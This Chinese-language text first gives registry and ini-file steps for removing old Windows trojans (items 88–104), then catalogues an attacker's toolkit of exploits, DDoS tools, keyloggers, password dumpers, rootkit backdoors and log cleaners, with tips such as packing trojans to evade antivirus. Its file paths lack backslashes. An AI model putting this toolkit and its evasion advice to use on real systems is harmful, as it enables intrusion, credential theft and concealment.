HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:SystemTrayIcon = "C:WINDOWSSysTrayIcon.Exe" 关闭保存Regedit,重新启动Windows
删除C:WINDOWSSysTrayIcon.Exe OK
清除木马v1.3 - 1.4 - 1.5: 打开win.ini文件 查找到run=nodll 更改为run= 关闭保存win.ini,重新启动Windows 删除c:windows odll.exe OK
清除木马v1.6: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:SystemTray = "SysTray.Exe" 关闭保存Regedit,重新启动Windows
删除C:windowssystray.exe OK
清除木马v1.7: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
查找到右边的项目:C:windowskernel16.dl,并删除 关闭保存Regedit,重新启动Windows
删除C:windowskernel16.dl OK
清除木马v1.8: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun和
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
查找到右边的项目:c:windowssystem.ini.,并删除 关闭保存Regedit。 打开win.ini文件 查找到run= kernel16.dl
更改为run= 关闭保存win.ini。 打开system.ini文件 查找到shell=explorer.exe kernel32.dl
更改为shell=explorer.exe 关闭保存system.ini,重新启动Windows 删除C:windowskernel16.dl OK
清除木马v1.9 - 1.9b: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun和
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
删除右边的项目:RegistryScan = "rundll16.exe" 关闭保存Regedit,重新启动Windows
删除C:windows undll16.exe OK
清除木马v2.0: 打开system.ini文件 查找到shell=explorer.exe trojanname.exe
更改为shell=explorer.exe 关闭保存system.ini,重新启动Windows 删除c:windows undll16.exe OK
清除木马v2.1 - 2.1 Gold + SubStealth- 2.1.3 Mod + 2.1.3 MUIE + 2.1 Bonus:
打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun和
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
删除右边的项目:WinLoader = MSREXE.EXE hkey_classes_rootexefileshellopencommand
将右边的项目更改为:@=""%1" %*" 关闭保存Regedit。 打开win.ini文件 查找到run=msrexe.exe和
load=msrexe.exe 更改为run= load= 关闭保存win.ini。 打开system.ini文件 查找到shell=explore.exe
msrexe.exe 更改为shell=explorer.exe 关闭保存system.ini,重新启动Windows 删除C:windows
msrexe.exe C:windowssystemsystray.dll OK
清除木马v2.2b1: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun和 删除右边的项目:加载器 =
"c:windowssystem***" 注:加载器和文件名是随意改变的 关闭保存Regedit。 打开win.ini文件 更改为run=
关闭保存win.ini。 打开system.ini文件 更改为shell=explorer.exe 关闭保存system.ini,重新启动Windows
删除相对应的木马程序 OK
88. Telecommando 1.54 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:SystemApp="ODBC.EXE" 关闭保存Regedit,重新启动Windows 删除C:windowssystem
ODBC.EXE OK --
89. The Unexplained 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:InetB00st = "C:WINDOWSTEMPINETB00ST.EXE" 关闭保存Regedit,重新启动Windows
删除C:WINDOWSTEMPINETB00ST.EXE OK
90. Thing v1.00 - 1.60 清除木马v1.00-1.12: 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:(Default) = "C:somepathhere hing.exe" 也有一些是在:
HKEY_LOCAL_MACHINESystemCurrentControlSetcontrolSessionManagerKnown16DL Ls
删除右边的项目:wsasrv.exe = "wsasrv.exe" 关闭保存Regedit,重新启动Windows
删除C:somepathhere hing.exe OK
清除木马v 1.20版本: 进入MS_DOS方式: del winspc13.exe del ms097.exe 打开system.ini文件
查找到shell=explorer.exe ms097.exe 更改为:shell=explorer.exe
关闭保存system.ini,重新启动Windows OK
清除木马v1.50版本: 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
这个项目的路径和文件名是随机改变的,察看有可疑的文件路径,将它删除。 关闭保存Regedit。 打开system.ini文件
查找到shell=explorer.exe后面是木马文件 更改为:shell=explorer.exe 关闭保存system.ini,重新启动Windows 删除相应的木马文件 OK
清除木马v1.50版本: 进入MS_DOS方式: del winspc13.exe del ms097.exe 打开system.ini文件
查找到shell=explorer.exe后面是木马文件 更改为:shell=explorer.exe 关闭保存system.ini,重新启动Windows 删除相应的木马文件 OK
91. Transmission Scount v1.1 - 1.2 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:Kernel16" = C:WINDOWSKernel16.exe 关闭保存Regedit,重新启动Windows
删除C:WINDOWSKernel16.exe OK
92. Trinoo 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的项目:
System Services = service.exe 关闭保存Regedit,重新启动Windows
删除C:windowssystemservice.exe OK
93. Trojan Cow v1.0 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:SysWindow = "C:WINDOWSSyswindow.exe" 关闭保存Regedit,重新启动Windows
删除C:WINDOWSSyswindow.exe OK
94. TryIt 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的项目:Rc5Dec
= C:Program FilesInternet Explorer\_.exe -guistart 关闭保存Regedit,重新启动Windows
删除C:Program FilesInternet Explorer\_.exe OK
95. Vampire v1.0 - 1.2 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:Sockets ="c:windowssystemSockets.exe" 关闭保存Regedit,重新启动Windows
删除c:windowssystemSockets.exe OK
96. WarTrojan v1.0 - 2.0 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:Kernel32 = "C:somepathserver.exe" 关闭保存Regedit,重新启动Windows
删除C:somepathserver.exe OK
97. wCrat v1.2b 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的项目:MS
Windows System Explorer ="C:WINDOWSsysexplor.exe" 关闭保存Regedit,重新启动Windows
删除C:WINDOWSsysexplor.exe OK
98. WebEx (v1.2, 1.3, and 1.4) 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:RunDl32 = "C:windowssystem ask_bar" 关闭保存Regedit,重新启动Windows
删除C:windowssystem ask_bar.exe和c:windowssystemmsinet.ocx OK
99. WinCrash v2 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:WinManager = "c:windowsserver.exe" 关闭保存Regedit 打开win.ini文件
查找到run=c:windowsserver.exe 更改为:run= 保存关闭win.ini,重新启动Windows
删除c:windowsserver.exe OK
100. WinCrash 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:MsManager ="SERVER.EXE" 关闭保存Regedit,重新启动Windows 删除C:windowssystem SERVER.EXE OK
101. Xanadu v1.1 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的项目:SETUP
= "c:somepathsetup.exe" 关闭保存Regedit,重新启动Windows 删除c:somepathsetup.exe OK
102. Xplorer v1.20 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 删除右边的项目:PCX =
"C:WINDOWSsystemPCX.exe" 关闭保存Regedit,重新启动Windows 删除C:WINDOWSsystemPCX.exe
OK
103. Xtcp v2.0 - 2.1 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的项目:msgsv32 = "C:WINDOWSsystemwinmsg32.exe" 关闭保存Regedit,重新启动Windows
删除C:WINDOWSsystemwinmsg32.exe OK
104. YAT 清除木马的步骤: 打开注册表Regedit 点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
删除右边的项目:Batterieanzeige = 'c:pathnamehereserver.exe /nomsg'
关闭保存Regedit,重新启动Windows 删除c:pathnamehereserver.exe OK
webadv:针对iis+sp3的溢出成功率很高(溢出后system权限!)
ipscan:大范围网段快速ipc猜解
svc:远程安装/删除Win2k服务
3389.vbs:远程安装Win2k终端服务不需i386
arpsniffer:arp环境sniffer(需要Winpcap2.1以上)
ascii:查询字符和数字ascii码(常用来对url编码用以躲避ids或脚本过滤)
ca:远程克隆账号
cca:检查是否有克隆账号
cgi-backdoor:几个cgi木马(十多种利用最新漏洞的web脚本后门,涵盖jsp,php,asp,cgi等等)
crackvnc:远程/本地破解Winvnc密码(本地破用-W参数)
pass.dic:密码字典
debploit:Win2k+sp2配置最佳权限提升工具
fpipe:端口重定向工具
fscan:superscan命令行版本(可定义扫描时的源端口并支持udp端口扫描)
hgod04:ddos攻击器
idahack:ida溢出
idq.dll:利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效,也是很棒的web后门)
IIS:idq溢出
inst.zip:指定程序安装为Win2k服务
ip_mail.rar:发送主机动态IP的软件
ipc.vbs:不依赖ipc$给远程主机开telnet
ispc.exe:idq.dll连接客户端
Keyghost.zip:正版键盘记录器
log.vbs:日志清除器(远程清除不依赖ipc$)
md5.pl:论坛md5加密密码破解器
msadc.pl:Winnt的msadc漏洞溢出器
MsSqlHack:mssql溢出程序
mysql-client:mysql客户端
Name.dic:最常用的中国人用户名(看看你常用的用户名在不在里面)
PassSniffer:大小仅3kb的非交换机sniffer软件
psexec:通过ipc管道直接登录主机
pskill:杀进程高手:)
pslist:列进程高手:)
rar:命令行下的中文版Winrar(功能相当全面)
reboot.vbs:远程重启主机的脚本
sdemo.zip:巨好的屏幕拍摄的录像软件
shed:远程查找Win9x的共享资源
sid:用sid列用户名
SkServerGUI:snake多重代理软件
SkSockServer:snake代理程序
SMBCrack:超快的ipc破解软件(适合破一台机)
socks:利用这工具安装木马,即使网关重新低格硬盘木马也在嘿嘿
SocksCap:把socks5代理转化为万能代理
SPC.zip:可以直接显示出远程Win98共享资源密码的东东
WMIhack:基于WMI服务进行账号密码的东东(不需要ipc)
skmontor:snake的注册表监视器(特酷的)
sql1.exe:mssql溢出程序2
sql2.exe:mssql溢出程序3
SqlExec:mssql客户端
SuperScan:GUI界面的优秀扫描器
syn:syn攻击第一高手
upx120:特好的压缩软件,常用来压缩木马躲避杀毒软件
wget:命令行下的http下载软件
Win2kPass2:Win2k的密码大盗
Winnuke:攻击rpc服务的软件(Win2ksp0/1/2/3+Winnt+Winxp系统不稳定)
smbnuke:攻击netbios的软件(Win2ksp0/1/2/3+Winnt+Winxp系统死机)
WinPcap_2_3:nmap,arpsniffer等等都要用这个
WinPcap_2_3_nogui.exe:无安装界面自动安装的WinPcap_2_3(命令行版)
scanbaby2.0:能对80%的mail服务利用漏洞列账号密码破解(超酷哦,去看rfc里有mail弱点说明)
SuperDic_V31:非常全面的黑客字典生成器
Getadmin:Win2k+sp3配置的权限提升程序(不错!!!)
whoami:了理自己的权限
FsSniffer:巨好的非交换机sniffer工具
twwwscan:命令行下巨好的cgi扫描器
TFTPD32:给远方开tftp服务的主机传文件(当然要有个shell)
RangeScan:自定义cgi漏洞的GUI扫描器
pwdump2:本地抓Winnt/2k密码散列值(不可缺)
pwdump3:远程抓Winnt/2k密码散列值(不可缺)
procexpnt:查看系统进程与端口关联(GUI界面)
nc:已经不是简单的telnet客户端了
CMD.txt:有什么cmd命令不懂就查查它
fport:命令行下查看系统进程与端口关联(没有GUI界面的procexpnt强)
BrutusA2:全功能的密码破解软件,支持telnet,ftp,http等服务的口令破解
cmd.reg:文件名自动补全的reg文件(命令行:按TAB键自动把sys补全为system,再按一次就变为system32)
regshell:命令行下的注册表编辑器
nscopy:备份员工具(当你是Backup Operators组的用户时有时你的权限会比admin还大)
session.rar:有了Win/nt2000目标主机的密码散列值,就可以直接发送散列值给主机而登录主机
klogger.exe:一个几kb的击键记录工具,运行后会在当前目录生成KLOGGER.TXT文件
smb2:发动smb的中间人MITM攻击的工具,在session中插入自己的执行命令
xptsc.rar:Winxp的远程终端客户端(支持Win2000/xp)
SQLhack.zip:相当快的mssql密码暴力破解器
mssql:相当快的mssql密码暴力破解器
ntcrack.zip:利用获取到的MD4 passwd hash破解帐号密码
SQLSniffer.rar:MSsql的密码明文嗅探器
TelnetHack.rar:在拥有管理员权限的条件下,远程打开Win2000机器的Telnet服务
RFPortXP.exe:XP下关联端口与进程的程序
SQLTools.rar:mssql工具包
ServiceApp.exe:远程安装/删除服务
hgod:具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项
hscan:小型综合扫描器(支持cisco,mysql,mssql,cgi,rpc,ipc(sid),ftp,ssh,smtp等等相当全面)
HDoor.rar:ping后门(icmp后门)
SIDUserEnum.exe:利用sid得到用户列表(小榕的那个sid有时不能完全列举出来)
RPC_LE.exe:利用rpc溢出使Win2k重启(对sp3+sp4hotfix有效)
r3389.exe:查询Terminal Server更改后的端口(1秒内)
smbsniffer.exe:获取访问本地主机网页的主机散列值(支持截获内网主机散列)
NetEnum.exe:通过3389端口+空连接获取对方主机大量信息
aspcode.exe:经测试最有效的asp溢出程序第二版(对sp2有效)
sslproxy:针对使用ssl加密协议的代理(扫描器通过它就可以扫描ssl主机了!!!!)
lsa2:在lsa注册表键里获取Winnt/2k的明文密码包括sqlserver的(打了补丁就没用了)
psu.exe:用指定进程的权限打开指定的程序
ldap.msi:ldap 轻量级目录服务客户端,通过389端口获取主机大量信息如账号列表
rootkit:从系统底层完美隐藏指定进程,服务,注册表鍵并可以端口绑定的内核级Win2k后门!!!